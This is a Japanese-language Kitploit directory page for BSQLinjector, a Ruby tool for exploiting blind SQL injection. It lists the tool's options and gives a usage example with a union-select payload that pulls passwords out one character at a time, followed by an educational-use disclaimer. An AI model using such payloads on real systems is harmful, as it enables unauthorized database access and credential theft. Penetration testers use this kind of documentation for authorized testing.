Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
BSQLinjector — Rubyで書かれたブラインドSQLインジェクション悪用ツール。 | Kitploit
ツール/GitHubGitHub/enjoiz/bsqlinjector
脆弱性分析ウェブアプリケーション悪用ペネトレーションテスト
GitHubenjoiz/bsqlinjector

BSQLinjector

Rubyで書かれたブラインドSQLインジェクション悪用ツール。

リポジトリを見る
10027501年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

BSQLinjector

BSQLinjectorはブラインド手法を使用してSQLデータベースからデータを取得します。アプリケーションに送信する前に、設定されたペイロードがどのように見えるかを明確に確認するために、「--test」スイッチを使用することをお勧めします。

オプション:

root@kitploit:~
  --file	    Mandatory - File containing valid HTTP request and SQL injection point (SQLINJECT). (--file=/tmp/req.txt)
  --pattern	    Mandatory - Pattern to look for when query is true. (--pattern=truestatement)
  --prepend	    Mandatory - Main payload. (--prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password,"
  --append	    How to end our payload. For example comment out rest of SQL statement. (--append='#)
  --schar	    Character placed around chars. This character is not used while in hex mode. (--schar="'")
  --2ndfile	    File containing valid HTTP request used in second order exploitation. (--2ndfile=/tmp/2ndreq.txt)

  --mode	    Blind mode to use - (between - b (generates less requests), moreless - a (generates less requests by using "<", ">", "=" characters), like - l (complete bruteforce), equals - e (complete bruteforce)). (--mode=l)
  --postgres        Use postgres "for" in substring function (e.g. from 1 for 1).
  --hex		    Use hex to compare instead of characters.
  --case	    Case sensitivity.

  --ssl		    Use SSL.
  --proxy	    Proxy to use. (--proxy=127.0.0.1:8080)

  --test	    Enable test mode. Do not send request, just show full payload.
  --special	    Include all special characters in enumeration.
  --start	    Start enumeration from specified character. (--start=10)
  --max		    Maximum characters to enumerate. (--max=10)
  --timeout	    Timeout in waiting for responses. (--timeout=20)
  --only-final	    Stop showing each enumerated letter.
  --comma	    Encode comma.
  --bracket	    Add brackets to the end of substring function. --bracket="))"
  --hexspace	    Use space instead of brackets to split hex values.
  --verbose	    Show verbose messages.

使用例:

root@kitploit:~
  ruby ./BSQLinjector.rb --pattern=truestatement --file=/tmp/req.txt --schar="'" --prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password," --append="'#" --ssl

免責事項

このリポジトリには、教育目的で厳密に開発されたツールが含まれています。本ツールを違法行為に悪用することは固く禁じられています。

法的通知

サイバーセキュリティと倫理的ハッキングに関するすべての現地の法律や規制を理解し遵守することが重要です。コンピュータシステム、ネットワーク、またはデータへの無許可のアクセスは違法であり、法律で罰せられます。このリポジトリの開発者は、ここに含まれるツールの悪用について一切の責任を負いません。

このリポジトリのツールを使用することにより、責任を持って倫理的に使用することに同意したものとみなします。自分に属さないネットワーク、システム、データにテストまたはアクセスを試みる前に、必ず明示的な許可を得てください。

ツールをダウンロード